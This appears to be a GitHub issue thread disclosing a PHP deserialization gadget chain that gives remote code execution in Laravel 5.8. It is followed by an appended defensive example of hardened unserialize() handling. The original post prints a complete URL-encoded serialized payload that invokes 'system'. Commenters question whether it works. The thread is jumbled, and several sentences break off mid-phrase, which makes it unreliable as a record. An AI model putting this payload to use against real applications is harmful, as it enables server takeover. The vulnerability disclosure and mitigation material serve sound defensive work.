There is an unserialize POP vulnerability that can RCE #2
Comments
Hi @guoyanan1g, does this only affect Laravel 5?
I haven't tested the lower versions, maybe u can try to find if these functions are in the lower versions 😂
Sorry, I was talking about the higher versions, we're currently using Laravel 8
I think it can't...
Hi @guoyanan1g, I have some trouble when reproducing the vulnerability 2、$c=new ClosureWrapper("dir");
Hi @PinkieChen, there is a similar CVE here: 1nhann/vulns#1 The comments hold a bit more information about replicating the issue, but it seems to boil down to not unserialising unvalidated user input, which is advised against by PHP already:
Sorry, the exp is just an example showing the call/callee relationship and the order, u can view it as a reference, pls do not use it as payload directly.
Hi @guoyanan1g, I think the exp you gave is wrong and cannot be reproduced in my local environment. The problem is that the

```php
namespace Illuminate\Queue\Capsule{
    class Manager{
        protected $manager;
        public function __construct($c)
        {
            $this->manager->method=$c; // This line
        }
    }
}
```

In Laravel 5.8, Manager's

```php
public function __call($method, $parameters)
{
    return $this->manager->$method(...$parameters);
}
```

In your exp example, the value of I created a repo (https://github.com/kang8/CVE-2021-43503) to prove this. If you can create a directory(like
@guoyanan1g, @kang8 Thanks in advance.
In fact, I can't even reproduce the vulnerability.
There is a PHP unserialize POP chain.
The files and the functions are:
① laravel5.8\vendor\laravel\framework\src\Illuminate\Routing\PendingResourceRegistration.php, __destruct()
② laravel5.8\vendor\laravel\framework\src\Illuminate\Queue\Capsule\Manager.php, __call()
③ laravel5.8\vendor\mockery\mockery\library\Mockery\ClosureWrapper.php, __invoke()
The exp is:
//O%3A46%3A%22Illuminate%5CRouting%5CPendingResourceRegistration%22%3A5%3A%7Bs%3A12%3A%22%00%2A%00registrar%22%3BO%3A32%3A%22Illuminate%5CQueue%5CCapsule%5CManager%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00manager%22%3BO%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A6%3A%22method%22%3BO%3A22%3A%22Mockery%5CClosureWrapper%22%3A1%3A%7Bs%3A31%3A%22%00Mockery%5CClosureWrapper%00closure%22%3Bs%3A6%3A%22system%22%3B%7D%7D%7Ds%3A7%3A%22%00%2A%00name%22%3BN%3Bs%3A13%3A%22%00%2A%00controller%22%3BN%3Bs%3A10%3A%22%00%2A%00options%22%3Ba%3A0%3A%7B%7Ds%3A13%3A%22%00%2A%00registered%22%3Bb%3A0%3B%7D
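The mitigation raised in the comments (not unserialising unvalidated user input), shown as an added example that is not code from this issue or from Laravel. `DemoGadget` and `safeLoad` are hypothetical names, and the input string is constructed; it contrasts default `unserialize()` with a call that instantiates no classes and rejects any object.

```php
<?php
// Added example, not code from this issue or from Laravel.
// DemoGadget is a hypothetical, harmless stand-in for a class whose magic
// method acts on properties that come straight from the serialized input.
final class DemoGadget
{
    public static $log = [];
    public $callback;
    public $arg;

    public function __destruct()
    {
        // Runs automatically when the object is destroyed.
        self::$log[] = ($this->callback)($this->arg);
    }
}

// Hardened loader (hypothetical helper): no class named in the input is
// instantiated, and any object found in the result is rejected.
function safeLoad(string $bytes)
{
    $value = unserialize($bytes, ['allowed_classes' => false]);
    $stack = [$value];
    while ($stack) {
        $item = array_pop($stack);
        if (is_object($item)) { // __PHP_Incomplete_Class placeholder
            throw new UnexpectedValueException('serialized objects are not accepted');
        }
        if (is_array($item)) {
            foreach ($item as $child) { $stack[] = $child; }
        }
    }
    return $value;
}

// Constructed input standing in for untrusted request data.
$input = 'O:10:"DemoGadget":2:{s:8:"callback";s:10:"strtoupper";s:3:"arg";s:11:"side effect";}';

// Default behaviour: the class named in the input is instantiated, and its
// destructor later runs with input-controlled properties.
$obj = unserialize($input);
unset($obj);
echo 'default unserialize: ', count(DemoGadget::$log), " destructor call(s)\n";

try {
    safeLoad($input);
} catch (UnexpectedValueException $e) {
    echo 'safeLoad: rejected, ', count(DemoGadget::$log), " destructor call(s) in total\n";
}
```

Where only plain data needs to cross the trust boundary, a format without object instantiation such as JSON avoids the problem entirely.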